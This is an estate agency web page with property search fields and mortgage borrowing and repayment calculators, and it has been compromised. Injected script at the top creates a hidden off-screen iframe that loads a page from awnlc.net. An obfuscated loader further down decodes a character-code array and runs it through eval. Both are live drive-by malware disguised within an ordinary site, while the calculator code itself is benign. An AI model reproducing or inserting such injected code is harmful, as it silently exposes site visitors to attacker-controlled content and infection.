var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://awnlc.net/styles/counter.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7d03d1087e22') + 1); _q.style.left = '-6200px'; document.write('
'); document.getElementById('pzadv').appendChild(_q);
Property ID
Status
Location
Minimum Price
Maximum Price
Minimum Bedrooms
Sort by
 
For Sale To Rent if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,99,94,88,99,94,95,91,86,107,106,94,90,97,90,107,105,35,90,101,98,38,94,105,107,102,35,103,94,101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,102,100,97,102,87,89,23,51,21,93,104,98,56,90,89,50,3,-1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;291-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));} if(x&&f&&012===10)e(s);</script><!--/c3284d--> <form name="aspnetForm" method="post" action="mortgages.aspx" id="aspnetForm"> <div> <input name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTcwODg1MTE2NmRkme7qb5e/hmF8vv2QOiin9/NPgMI=" type="hidden"> </div> <!-- top menu --> <!-- end top menu --> <div> <table width="630" align="center" border="0" cellpadding="0" cellspacing="0"> <tbody><tr> <td> <script> function validate(){ var amt var error_string = ""; var characters="qwertyuiopasdfghjkl\/?><|{}~@!+=zxcvbnm,£$#[]!%^&*()_+"; amt=window.document.aspnetForm.Amount.value; var is_bad = hasIllegalCharacters(amt,characters); if ((amt == "")||(is_bad == true)) { error_string +="You must enter an amount using numbers, no commas and one decimal point only.\n";} // amt=window.document.aspnetForm.Term.value; var is_bad = hasIllegalCharacters(amt,characters); if ((amt == "")||(is_bad == true)) { error_string +="You must enter the term in whole months - numbers only.\n";} // amt=window.document.aspnetForm.Intrate.value; var is_bad = hasIllegalCharacters(amt,characters); if ((amt == "")||(is_bad == true)) { error_string +="You must enter an interest rate - only numbers and a decimal point.\n";} if (error_string =="") { return true;} else { alert(error_string); return false; } } function hasIllegalCharacters(test_string, illegal_string) { var is_illegal = false; var the_char = ""; for (var loop=0; loop < illegal_string.length; loop++) { the_char = illegal_string.charAt(loop); if (test_string.indexOf(the_char) != -1) { is_illegal = true; } } return is_illegal; } function calculate(){ var principal = window.document.aspnetForm.Amount.value; var term = window.document.aspnetForm.Term.value; term = term*12; var rate = window.document.aspnetForm.Intrate.value; var test = validate(); var rate2 = rate/1200; var calc1 = Math.pow((1+rate2),term); var calc2 = principal*rate2; var calc3 = (1-1/calc1); var rept = calc2/calc3; rept=currency(rept); var intPmt = calc2; intPmt=currency(intPmt); var TotRept=calc2*term; TotRept=currency(TotRept); var CapTotRept= (rept*term)-principal; CapTotRept=currency(CapTotRept); // if (test == true) {window.document.aspnetForm.Rept.value=rept;} else {window.document.aspnetForm.Rept.value="Error";} // if (test == true) {window.document.aspnetForm.TotRept.value=TotRept;} else {window.document.aspnetForm.TotRept.value="Error";} // if (test == true) {window.document.aspnetForm.IntRept.value=intPmt;} else {window.document.aspnetForm.IntRept.value="Error";} // if (test == true) {window.document.aspnetForm.TotCapRept.value=CapTotRept; window.document.aspnetForm.Rept.focus();} else {window.document.aspnetForm.TotCapRept.value="Error";} } function currency(my_amt){ // //gets integer of the amount var intMyAmt = parseInt(my_amt); // //subtracts integer from amount to arrive at pence //multiplies by 100 and rounds var pence = Math.round((my_amt-intMyAmt)*100); // // if result is zero formats pence as '.00' if(pence == 0) { pence = "00";} // //if result is greater than zero and less than 10 formats pence as '.#0' if((pence >0)&&(pence <10)) {pence = "0"+pence;} // //concatenates the integer of the amount and pence to show as currency var amt = intMyAmt+"."+pence; return amt; } function calcMax() { var result_a = 0; var result_b = 0; //var max_borrow = 0; income_a = parseInt(document.aspnetForm.income_a.value); income_b = parseInt(document.aspnetForm.income_b.value); //result_a = (income_a * 3.5) + (income_b); if(income_a > 0 && income_b > 0) { result_a = income_a * 3.5 + income_b; result_b = (income_a + income_b) * 2.75; } else( result_a = income_a * 3.5); if(result_a > result_b) { max_borrow = result_a; } else max_borrow = result_b; document.aspnetForm.max_borrow.value = max_borrow; } </script> <table class="style4" border="0" cellpadding="3" cellspacing="3" align="center"> <tbody><tr> <td valign="top"> <table align="center" border="0" bordercolor="#6699cc" cellpadding="3" cellspacing="0" class="style3"> <tbody><tr> <td valign="top"> <p style="margin-bottom: 0pt;" class="style1"><span class="underline"><b> How much can I borrow?</b></span></p> <div align="center"> </div> <p class="style1">Each lender calculates how much you can borrow on a different basis.<br> The information below once calculated will give you an indication<br> of your borrowing potential.</p> <p> </p> <table width="450" align="center" border="1" bordercolor="#6699cc" cellpadding="4" cellspacing="0"> <tbody><tr> <td colspan="2" class="style2"> <p class="style1"> Calculate Maximum Available Borrowing</p></td> </tr> <tr> <td colspan="2" class="style1"> <p class="style1">Enter the following information to calculate the maximum amount you can borrow.</p></td> </tr> <tr> <td width="215" class="style1"><p class="style1">First Annual Income: </p></td> <td width="215" class="style1"><p class="style1">£ <input name="income_a" id="income_a" type="text"></p> </td> </tr> <tr> <td class="style1"><p class="style1">Second Annual Income: </p></td> <td class="style1"><p class="style1">£ <input name="income_b" id="income_b" type="text"></p> </td> </tr> <tr align="center"> <td colspan="2"> <p> <input name="Calculate" value="Calculate" onclick="calcMax();" class="buttons" type="button"> </p></td> </tr> <tr align="center"> <td colspan="2"> </td> </tr> <tr align="center"> <td colspan="2"><p><strong>Maximum Available Borrowing</strong></p></td> </tr> <tr align="center"> <td><p class="style1">Maximum amount: </p></td> <td><div align="left"><p class="style1">£ <input name="max_borrow" onfocus="blur();" type="text"></p> </div></td> </tr> </tbody></table> <p class="underline"> </p> <p class="underline"> </p> <p class="style1"><b>How much will my mortgage cost?</b></p> <p class="style1">The exact cost of your mortgage will depend on a number of factors.<br> The payment calculator below provides an approximate level<br> of monthly payments.</p> <p> </p> <table width="450" align="center" border="1" bordercolor="#6699cc" cellpadding="4" cellspacing="0"> <tbody><tr> <td colspan="2" class="style2"> <p class="style1">Monthly Payment Calculator</p></td> </tr> <tr> <td colspan="2" class="style1"> <p class="style1">Enter the following information to calculate the cost of your mortgage.</p></td> </tr> <tr> <td width="216" class="style1"> <p class="style1">Loan Amount</p></td> <td width="212" class="style1"><p class="style1">£ <input size="17" name="Amount"></p></td> </tr> <tr> <td class="style1"> <p class="style1">Interest Rate</p></td> <td class="style1"><p class="style1"><input size="8" name="Intrate"> % </p></td> </tr> <tr> <td class="style1"> <p class="style1">Loan Period</p></td> <td class="style1"> <p class="style1"> <input size="6" name="Term"> years </p></td> </tr> <tr align="center"> <td colspan="2"> <p> <input onclick="calculate()" value="Calculate" name="CalcBtn" class="buttons" type="button"> </p></td> </tr> <tr align="center"> <td colspan="2"> </td> </tr> <tr align="center"> <td colspan="2"><p>REPAYMENT MORTGAGE</p></td> </tr> <tr align="center"> <td><div align="right"> <p style="margin-bottom: 0pt;" class="style1">Monthly repayment: </p> </div></td> <td><div align="left"><p class="style1">£ <input size="10" name="Rept" onfocus="blur()"></p> </div></td> </tr> <tr align="center"> <td><p class="style1">Total interest over life of mortgage: </p></td> <td><div align="left"><p class="style1">£ <input size="10" name="TotCapRept" onfocus="blur()"></p> </div></td> </tr> <tr align="center"> <td colspan="2"> </td> </tr> <tr align="center"> <td colspan="2"><p>INTEREST ONLY MORTGAGE</p></td> </tr> <tr align="center"> <td><p class="style1">Monthly repayment: </p></td> <td><div align="left"><p class="style1">£ <input size="10" name="IntRept" onfocus="blur()"></p> </div></td> </tr> <tr align="center"> <td><p class="style1">Total interest over life of mortgage: </p></td> <td><div align="left"><p class="style1">£ <input size="10" name="TotRept" onfocus="blur()"></p></div></td> </tr> </tbody></table> </td> </tr> </tbody></table> </td> </tr> </tbody></table> </td> </tr> </tbody></table> </div> <!-- bottom menu --> <!-- end bottom menu --> </form> </body></html>  </div> <!--/.right--> </div> <!--/#search-main--> <div id="footer"> <div class="inner"> <p class="left phone">Sales + Lettings <strong>020 8845 1122‎</strong></p> <p class="right">Thomas Paige Partnership Ltd, 254 Kingshill Avenue, Hayes, Middx, UB4 8BZ</p> </div> <!--/.inner--> </div> <!--/#footer--> <div id="credit"> <div class="inner"> <p>© copyright 2008 Thomas Paige Partnership Ltd. Registerd in Englnad No: 7373831. All Rights Reserved. </a></p> </div> <!--/.inner--> </div> </div> <!--/#wrap--> </body> </html>